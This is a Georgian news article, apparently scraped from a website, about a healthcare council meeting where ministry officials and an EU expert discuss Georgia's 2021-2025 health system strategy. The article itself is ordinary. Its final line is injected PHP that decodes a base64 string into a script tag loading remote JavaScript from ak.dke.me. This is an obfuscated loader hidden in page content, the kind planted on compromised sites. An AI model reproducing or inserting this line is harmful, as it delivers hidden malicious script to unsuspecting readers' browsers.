celsiusi
ავერსი საქკაბელი
ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრის ეკატერინე ტიკარაძის ხელმძღვანელობით საყოველთაო ჯანდაცვის საბჭოს სხდომა გაიმართა.
 
როგორც „ბიზნესთაიმს“ ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის სამინისტროდან აცნობეს, საბჭოს წევრებმა სხდომაზე 2021-2025 წლების საქართველოს ჯანმრთელობის დაცვის სისტემის განვითარების სტრატეგიის ძირითადი ამოცანები და პრიორიტეტული მიმართულებები განიხილეს.
 
მათივე ინფორმაციით, სტრატეგია საერთაშორისო და ეროვნულ დონეზე აღიარებულ პრინციპებთან და ფასეულობებთან მიმართებაში დარგის განვითარების საფუძველია.
 
როგორც უწყებაში აცხადებენ, ჯანდაცვის სისტემის პრიორიტეტულ მიმართულებებს ხარისხიანი სამედიცინო სერვისების განვითარება, დაფინანსების სისტემის გაუმჯობესება, პირველადი ჯანდაცვის და სახელმწიფო სექტორის გაძლიერება წარმოადგენს. ჯანმრთელობის დაცვის სისტემის განვითარების სტრატეგიაზე მუშაობა ევროკავშირის „საჯარო მმართველობის რეფორმის“ პროექტის ტექნიკური და ფინანსური მხარდაჭერით მიმდინარეობს, რომელიც მარტის ბოლომდე დასრულდება.
 
ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრის, ეკატერინე ტიკარაძის განცხადებით, ჯანდაცვის სისტემის ერთ-ერთ პრიორიტეტულ მიმართულებას პირველადი ჯანდაცვის რგოლის განვითარება წარმოადგენს და ეს არის გამოწვევა.
 
„პირველადი ჯანდაცვა სამედიცინო სერვისების და ხელმისაწვდომობის სწორი განვითარების საწყისი და საფუძველია. მას დიდი მნიშვნელობა აქვს, როგორც სწორი დანახარჯების და ინვესტიციის კუთხით, ასევე ეკონომიკური თვალსაზრისით. ჯანდაცვის სისტემის ერთ-ერთ პრიორიტეტულ მიმართულებას სწორედ პირველადი ჯანდაცვის რგოლის განვითარება წარმოადგენს და ეს ჩვენი გამოწვევაა. ჯანდაცვის სექტორის განვითარების სტრატეგიის შემუშავებაში ევროკავშირის ჩართულობა და მათი გამოცდილების გაზიარება მნიშვნელოვანია. სწორედ მათ გამოცდილებაზე დაყრდნობით უფრო ეფექტურად და შემჭიდროვებულ ვადებში შევძლებთ იმ ხარისხიანი და სწორი რეფორმის გატარებას, რომელსაც დღეს საქართველოს ჯანდაცვის სისტემა საჭიროებს“,-განაცხადა ეკატერინე ტიკარაძემ.
 
ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრის პირველი მოადგილის, თამარ გაბუნიას თქმით, მნიშვნელოვანია, ჯანდაცვის სისტემის განვითარების სტრატეგიული ამოცანების და ღონისძიებების სწორად დაგეგმვა, რომელიც დასაბუთებულ რეკომენდაციებს უნდა ემყარებოდეს.
 
„ჯანდაცვის სამინისტრო ევროკავშირის დახმარებით ჯანდაცვის სექტორის განვითარების 2021-2025 წლების სტრატეგიაზე მუშაობს. უნდა ჩამოყალიბდეს მკაფიო სტრატეგიული ჩარჩო, რაც ქვეყანას უნივერსალური ხელმისაწვდომობის მიზნებამდე მიიყვანს. 2030 წელი არის მდგრადი განვითარების მიზნების შესრულების წელი. მნიშვნელოვანია, სტრატეგიული ამოცანები და ღონისძიებები დაიგეგმოს სწორად და ემყარებოდეს დასაბუთებულ რეკომენდაციებს. საყოველთაო ჯანდაცვის საბჭოს შეხვედრაზე სტრატეგიის ძირითადი მიმართულებები - ჯანდაცვაზე ხელმისაწვდომობისა და ხარისხის ეფექტურობის გაუმჯობესების საკითხები განვიხილეთ. მარტის ბოლომდე სამინისტრო დეტალურ დისკუსიებს გააგრძელებს სელექტიური კონტრაქტირების, პირველადი ჯანდაცვის განვითარების, ხარისხის უზრუნველყოფის მექანიზმების, ასევე ფინანსური დაცვის გაუმჯობესების თაობაზე, რაც საშუალებას მოგვცემს ჩამოვაყალიბოთ გამართული სტრატეგიის დოკუმენტი“,- განაცხადა თამარ გაბუნიამ.
 
ევროკავშირის „საჯარო მმართველობის რეფორმის პროექტის“ ჯანდაცვის ექსპერტის ლაიოშ კოვაჩის თქმით, ჯანმრთელობის დაცვის სისტემის განვითარების სტრატეგის მთავარ მიმართულებას ხარისხიან სამედიცინო სერვისებზე ხელმისაწვდომობის უზრუნველყოფა, ასევე ჯიბიდან დანახარჯების შემცირება წარმოადგენს.
 
„ჯანდაცვის სამინისტრომ ერთი წლის წინ დაიწყო ჯანდაცვის ეროვნული სტრატეგიის შემუშავება. სამწუხაროდ, კოვიდ-19-მა ზეგავლენა მოახდინა პროცესის დასრულების ვადებზე. ევროკავშირი დახმარებას უწევს სამინისტროს სტრატეგიის შემუშავების პროცესში. უკვე ჩამოყალიბებულია ძირითადი პრიორიტეტები და მიზნები. ჯანმრთელობის დაცვის სისტემის განვითარების სტრატეგის მთავარ მიმართულებას ხარისხიან სამედიცინო სერვისებზე ხელმისაწვდომობის უზრუნველყოფა, ასევე ჯიბიდან დანახარჯების შემცირება წარმოადგენს“,- განაცხადა ლაიოშ კოვაჩმა.
 
უწყების ინფორმაციით, 2021-2025 წლების ჯანდაცვის სისტემის განვითარების სტრატეგიაზე მუშაობა მაისის თვეში დასრულდება.
1335
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");